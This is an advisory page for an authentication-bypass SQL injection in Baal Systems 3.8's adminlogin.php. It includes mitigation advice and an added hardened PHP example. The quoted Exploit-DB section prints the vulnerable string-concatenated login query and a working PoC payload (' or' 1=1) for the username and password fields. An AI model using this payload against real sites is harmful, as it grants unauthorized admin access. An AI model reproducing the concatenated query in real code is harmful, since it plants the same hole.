Vendor: Baal Systems
By: cr4wl3r
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Baal Systems
Affected Version From: 3.8
Affected Version To: 3.8
Patch Exists: NO
Related CWE: N/A
CPE: a:baal_systems:baal_systems
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability

Baal Systems version 3.8 and below is vulnerable to an authentication bypass through SQL injection. The admin login script, adminlogin.php, concatenates the username and password POST parameters directly into the SQL query that looks up the admin account, without sanitizing them. An attacker who supplies a crafted username and password changes the logic of that query so that it returns a row, and the application then creates an admin session without valid credentials.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
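
A hardened form of the adminlogin.php check shown in the Exploit-DB data below, added here as an example; it is not code from Baal Systems or from the advisory. It assumes PDO replaces the db_query() wrapper and that tbluser.password stores password_hash() output. The admin_login function, the baal_ prefix and the sample account are hypothetical.

```php
<?php
// Added example, not Baal Systems code: hardened form of the adminlogin.php check.
// Assumptions: PDO replaces the db_query() wrapper, and tbluser.password holds
// password_hash() output instead of the plain-text password.

function admin_login(PDO $pdo, string $tableprefix, $username, $password): ?array
{
    // Identifiers cannot be bound, so the table prefix is allow-listed instead.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $tableprefix)) {
        throw new InvalidArgumentException('unexpected table prefix');
    }
    // Reject array input such as username[]=x before it reaches the query.
    if (!is_string($username) || !is_string($password)) {
        return null;
    }
    // User input is passed as a bound parameter and never becomes SQL text.
    $stmt = $pdo->prepare(
        "SELECT userid, username, password FROM {$tableprefix}tbluser
         WHERE username = :username AND userrole = 'admin'"
    );
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // The password is compared against the stored hash outside the query.
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    return $row;
}

// Constructed test data: an in-memory SQLite database stands in for the real one.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE baal_tbluser (userid INTEGER PRIMARY KEY,
            username TEXT, password TEXT, userrole TEXT)");
$ins = $pdo->prepare("INSERT INTO baal_tbluser (username, password, userrole)
                      VALUES (?, ?, 'admin')");
$ins->execute(['siteadmin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// The input from the PoC is treated as a literal username and matches no row.
var_dump(admin_login($pdo, 'baal_', "' or' 1=1", "' or' 1=1"));
// The legitimate credentials still authenticate.
$ok = admin_login($pdo, 'baal_', 'siteadmin', 'constructed-sample-pw');
var_dump($ok !== null && $ok['username'] === 'siteadmin');

// In the login page, on success: call session_regenerate_id(true), set the
// $_SESSION values as before, send the Location header, then exit.
```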

Exploit-DB raw data:

[+] Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>

[+] Vuln Code : 

[adminlogin.php]

<?php
include("common.php");
if (!empty($_POST['password'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    $query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
    $result1 = db_query($query);
    $rows = db_num_rows($result1);
    $row = db_fetch_array($result1);
    if ($rows != 0) {
        if (session_is_registered("whossession")) {
            $_SESSION['who'] = "admin";
            $_SESSION['userrole'] = "admin";
            $_SESSION['username'] = $username;
            $_SESSION['usernum'] = $row["userid"];
            header("location:admin.php");
        } else {
            session_register("whossession");
            $_SESSION['who'] = "admin";
            $_SESSION['userrole'] = "admin";
            $_SESSION['username'] = $username;
            $_SESSION['usernum'] = $row["userid"];
            header("location:admin.php");
        } 
    } else {
        header("location:adminlogin.php?error=yes");
    } 
} else {

    ?>

[+] PoC : 

[BaalSystems_path]/adminlogin.php


username: ' or' 1=1
Password: ' or' 1=1